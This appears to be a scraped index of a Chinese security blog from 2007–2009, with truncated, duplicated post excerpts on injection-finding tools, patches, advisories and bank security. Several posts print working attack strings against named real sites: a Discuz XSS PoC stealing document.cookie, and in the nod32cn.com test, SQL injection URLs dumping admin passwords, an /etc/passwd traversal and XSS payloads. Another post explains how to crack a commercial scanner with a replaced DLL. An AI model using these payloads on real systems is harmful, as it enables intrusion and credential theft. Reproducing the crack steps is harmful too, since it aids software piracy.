IDA Pro 5.5(+Hex-Rays Decompiler v1.1)
作者:ZhaoHuAn 日期:2009-12-19
国内首家支持挂马查询—超级巡警安全中心上线
作者:ZhaoHuAn 日期:2009-07-11
最近AA总他们上线了一个新产品:http://a.sucop.com/ 支持一下!
近日,国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台,即“超级巡警安全中心”,该安全中心致力于对互联网整体安全状况进行评测,通过该安全中心的检测和评估,可为企业及个人用户提供权威准确的分析结果和防护病毒的措施,是目前国内第一款功能完备,性能强大,评价结果客观公正的网络安全评估平台。
目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能,通过这些检测,可以快速发现并提醒日常互联网访问中可能存在的危险站点。
link: http://wlj.me/index.php/2009/07/a-sucop-com/
近日,国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台,即“超级巡警安全中心”,该安全中心致力于对互联网整体安全状况进行评测,通过该安全中心的检测和评估,可为企业及个人用户提供权威准确的分析结果和防护病毒的措施,是目前国内第一款功能完备,性能强大,评价结果客观公正的网络安全评估平台。
目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能,通过这些检测,可以快速发现并提醒日常互联网访问中可能存在的危险站点。
link: http://wlj.me/index.php/2009/07/a-sucop-com/
SimpleDorkGUi & G-Injector
作者:ZhaoHuAn 日期:2009-05-30
顾名思义,就是通过搜索引擎定义关键字来自动查找注入点的工具。对于比较庞大、脚本种类比较复杂的大型站点做渗透有所帮助。例如:site:qq.com inurl:php?id=
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码 否则你将会看不到下面的操作工具栏;) */
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码txtField = Text(myFrame, font=('Verdana', 8, ''),fg='orange', bg='black', width=400, height=32, wrap=WORD, yscrollcommand=scb.set)
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
[MS09-012]Token Kidnapping 安全补丁(KB956572)
作者:ZhaoHuAn 日期:2009-04-20
去年win下最流行的一个本地提权的漏洞微软终于放出补丁了。。
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
Discuz <=7.0(frame.php) xss Vulnerability
作者:ZhaoHuAn 日期:2009-04-18
前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。
PoC:
程序代码
----->
跳转到了
程序代码
PoC:
程序代码http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>
----->
跳转到了
程序代码http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[ZZ]防止CSRF攻击
作者:ZhaoHuAn 日期:2008-09-04
转一篇不错的文章,不是很新,有些地方可以看一看:)
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
nod32官方web渗透测试
作者:ZhaoHuAn 日期:2008-08-16
前几天Ntsill叫我帮忙看看nod32官方站点,最近他们在负责这个,呵呵,简单测试了一下还是存在一些问题的
SQL注入:
管理员密码就爆出来了
程序代码
程序代码
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码
程序代码
SQL注入:
管理员密码就爆出来了
程序代码http://www.nod32cn.com:80/default.php?aid=1+and+1=2+union+all+select+concat(username,char(58),password),2+from+manager--&p=2&id=86
程序代码http://www.nod32cn.com:80/VisualizeShop.php?vid=7+and+1%3D0&action=Edit
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码http://www.nod32cn.com:80/virus.php?prefix=>"><ScRiPt%20%0a%0d>alert(/xss/)%3B</ScRiPt>
程序代码http://www.nod32cn.co...
XSS Related
作者:ZhaoHuAn 日期:2008-05-11
From my over sized Firefox scrapbook and draft queue cleanup:
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
Acunetix Web Vulnerability Scanner V5.1(crack)
作者:ZhaoHuAn 日期:2008-02-27
·Acunetix.Web.Vulnerability.Scanner.V5.1.Build.71023
下载地址:http://www.skycn.com/soft/37545.html
破解:将压缩包中的dwl.dll覆盖到目录下替换原文件即可。
点击下载此文件
下载地址:http://www.skycn.com/soft/37545.html
破解:将压缩包中的dwl.dll覆盖到目录下替换原文件即可。
点击下载此文件
迅雷再爆高危0Day漏洞
作者:ZhaoHuAn 日期:2007-11-17
一、事件分析:
今日,超级巡警团队捕获到一个利用迅雷0day高危漏洞挂马的网页木马。迅雷用户在浏览到黑客精心构造的包含恶意代码的网页后,会在后台下载木马程序 并运行。漏洞利用代码中的ClassID(F3E70CEA-956E-49CC-B444-73AFE593AD7F),经过超级巡警分析员确认,漏洞出现在迅雷看看(pplayer.dll_1_work)组件上。迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响,目前厂商 还未发布补丁,迅雷安装时将默认安装迅雷看看的控件,所以所有安装了迅雷的用户都将受到此次漏洞的影响。
影响版本: 迅雷5 5.7.4.401
pplayer.dll_1_work 1.2.3.49
构造的漏洞利用网页截图:
用户在浏览恶意构造的网页后,目前会自动下载名为:Worm.Win32.Downloader.an 的木马下载器,该下载器主要下载盗号木马来窃取用户的网游/IM工具账号。
二、解决方案
1、在迅雷发布补丁之前请暂时卸载迅雷,或者使用临时解决方案,将下面内容保存为.reg文件,双击导入注册表:
------------------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F3E70CEA-956E-49CC-B444-73AFE593AD7F}]
"Compatibility Flags"=dword:00000400
-------------------------------------------------------
2、推荐安装超级巡警监测查杀木马,并及时修改自己的QQ/网游账号密码。
3、请广大用户及时使用...
今日,超级巡警团队捕获到一个利用迅雷0day高危漏洞挂马的网页木马。迅雷用户在浏览到黑客精心构造的包含恶意代码的网页后,会在后台下载木马程序 并运行。漏洞利用代码中的ClassID(F3E70CEA-956E-49CC-B444-73AFE593AD7F),经过超级巡警分析员确认,漏洞出现在迅雷看看(pplayer.dll_1_work)组件上。迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响,目前厂商 还未发布补丁,迅雷安装时将默认安装迅雷看看的控件,所以所有安装了迅雷的用户都将受到此次漏洞的影响。
影响版本: 迅雷5 5.7.4.401
pplayer.dll_1_work 1.2.3.49
构造的漏洞利用网页截图:
用户在浏览恶意构造的网页后,目前会自动下载名为:Worm.Win32.Downloader.an 的木马下载器,该下载器主要下载盗号木马来窃取用户的网游/IM工具账号。
二、解决方案
1、在迅雷发布补丁之前请暂时卸载迅雷,或者使用临时解决方案,将下面内容保存为.reg文件,双击导入注册表:
------------------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F3E70CEA-956E-49CC-B444-73AFE593AD7F}]
"Compatibility Flags"=dword:00000400
-------------------------------------------------------
2、推荐安装超级巡警监测查杀木马,并及时修改自己的QQ/网游账号密码。
3、请广大用户及时使用...
招行、工行、建行、兴业、恒生电子银行安全性比较
作者:ZhaoHuAn 日期:2007-07-12
招行、工行、建行、兴业、恒生电子银行安全性比较
来源:lxxm.com
安全性是电子银行最大的考核要素.国内通过网上银行行窃的案例并不在少数,在网上管理账户到底安全不安全,哪个更安全?本文从一个普通用户角度,看这五个银行的安全性.
招行是国内电子银行的老牌,毫无争议,招行对国内电子银行的发展和促进做出重大贡献.目前招行的电子银行在国内应该算口碑最好的一个.招行现在的电子银行提供有客户端的专业版和无客户端的web版.而且以专业版为主,Web版为辅助.工行、建行、兴业主体上还是web模式.恒生也是提供web模式的银行.
--------------------------------------------------------------------------------
招商银行:专业人士的最爱,安全性和易用性的博弈
招行的专业版,采用证书+客户端.其中的证书下载前必须去银行柜台登记,并领用专门的号码后才可以下载.下载下来不允许直接备份在硬盘上(可以在u盘上,以前招行是可以直接备份在电脑硬盘上).
因为证书以及客户端存在,等于说,别人想盗用你的存款时候,首选要知道电子银行的登陆密码(不是查询密码).然后还要掌握安装有证书的电脑,同时还要知道取款密码,在三个都成立情况下,才可以窃取成功.【招行的电子银行密码分有,电子银行登录密码、账户查询密码、取款密码.】
客户端的存在,基本上免除了用户误用钓鱼网站导致而导致失窃的情况(当然,如果钓鱼网站模仿招行大众版除外),所以我的建议就是用专业版的用户最好的选择就是关闭大众版.
目前较高级的黑客软件和木马,即使能够窃取到查询密码、取款密码,但是在盗用招行的文件证书上还是有一定难度,就是盗用成功了,招行会用短信告知用户,你在某时成功备份了招行电子银行的文件证书.盗用者在窃取到证书后,恢复证书过程中,必须知道电子银行的登陆密码,而且必须正确回答3个预先设置号的问题,回答正确情况下,招行会把一个一次性密码发送到用户原来注册登记的手机上,然后才能修复成功.
可以说,在不考虑移动证书...
来源:lxxm.com
安全性是电子银行最大的考核要素.国内通过网上银行行窃的案例并不在少数,在网上管理账户到底安全不安全,哪个更安全?本文从一个普通用户角度,看这五个银行的安全性.
招行是国内电子银行的老牌,毫无争议,招行对国内电子银行的发展和促进做出重大贡献.目前招行的电子银行在国内应该算口碑最好的一个.招行现在的电子银行提供有客户端的专业版和无客户端的web版.而且以专业版为主,Web版为辅助.工行、建行、兴业主体上还是web模式.恒生也是提供web模式的银行.
--------------------------------------------------------------------------------
招商银行:专业人士的最爱,安全性和易用性的博弈
招行的专业版,采用证书+客户端.其中的证书下载前必须去银行柜台登记,并领用专门的号码后才可以下载.下载下来不允许直接备份在硬盘上(可以在u盘上,以前招行是可以直接备份在电脑硬盘上).
因为证书以及客户端存在,等于说,别人想盗用你的存款时候,首选要知道电子银行的登陆密码(不是查询密码).然后还要掌握安装有证书的电脑,同时还要知道取款密码,在三个都成立情况下,才可以窃取成功.【招行的电子银行密码分有,电子银行登录密码、账户查询密码、取款密码.】
客户端的存在,基本上免除了用户误用钓鱼网站导致而导致失窃的情况(当然,如果钓鱼网站模仿招行大众版除外),所以我的建议就是用专业版的用户最好的选择就是关闭大众版.
目前较高级的黑客软件和木马,即使能够窃取到查询密码、取款密码,但是在盗用招行的文件证书上还是有一定难度,就是盗用成功了,招行会用短信告知用户,你在某时成功备份了招行电子银行的文件证书.盗用者在窃取到证书后,恢复证书过程中,必须知道电子银行的登陆密码,而且必须正确回答3个预先设置号的问题,回答正确情况下,招行会把一个一次性密码发送到用户原来注册登记的手机上,然后才能修复成功.
可以说,在不考虑移动证书...
